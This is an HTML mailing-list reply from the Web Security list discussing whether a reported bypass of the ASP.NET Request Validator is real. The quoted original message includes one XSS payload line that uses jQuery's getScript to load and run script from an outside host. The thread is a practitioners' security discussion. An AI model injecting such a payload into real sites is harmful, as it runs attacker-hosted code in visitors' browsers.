<html>
<head>
<style><!--
.hmmessage P
{
margin:0px;
padding:0px
}
body.hmmessage
{
font-size: 10pt;
font-family:Tahoma
}
--></style>
</head>
<body class='hmmessage'>
If this jQuery .getScript request is only performed client-side, then it wouldn't even be sent to the server-side ASP.NET XSS validation to be bypassed.<br><br><hr id="stopSpelling">Date: Sat, 19 Feb 2011 15:39:06 +0000<br>From: ryandewhurst@gmail.com<br>To: websecurity@webappsec.org<br>Subject: [WEB SECURITY] ASP.NET Request Validator Bypass?<br><br><span class="ecxstatus-body"><span class="ecxstatus-content"><span class="ecxentry-content">Hi,<br><br>Recently on a client test I was able to bypass the ASP.NET Request Validator by leveraging the jQuery library which was included in the page. I am mainly a LAMP guy and my knowledge of ASP.NET and how to set it up is minimal.<br>
<br>I was wondering if anyone could confirm whether my bypass affects all ASP.NET installations or whether or not this particular client had it configured incorrectly.<br><br>I used the following jQuery function to bypass the filter:<br>
</span></span></span><span class="ecxstatus-body"><span class="ecxstatus-content"><span class="ecxentry-content">$.getScript('//ha.ckers.org/.j');</span></span></span><br><span class="ecxstatus-body"><span class="ecxstatus-content"><span class="ecxentry-content"><br>
Thanks,<br>Ryan<br><br clear="all"></span></span></span>Ryan Dewhurst<br><br>blog <a href="http://www.ethicalhack3r.co.uk" target="_blank">www.ethicalhack3r.co.uk</a><br>projects <a href="http://www.dvwa.co.uk" target="_blank">www.dvwa.co.uk</a> | <a href="http://www.webwordcount.com" target="_blank">www.webwordcount.com</a><br>
twitter <a href="http://www.twitter.com/ethicalhack3r" target="_blank">www.twitter.com/ethicalhack3r</a><br>
<br>_______________________________________________
The Web Security Mailing List

websecurity@lists.webappsec.org
http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org                                       </body>
</html>